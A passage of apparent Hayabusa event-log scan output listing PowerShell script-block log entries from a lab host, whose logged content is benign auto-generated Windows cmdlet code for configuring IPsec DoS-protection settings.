Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdl",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdl",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"etization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} 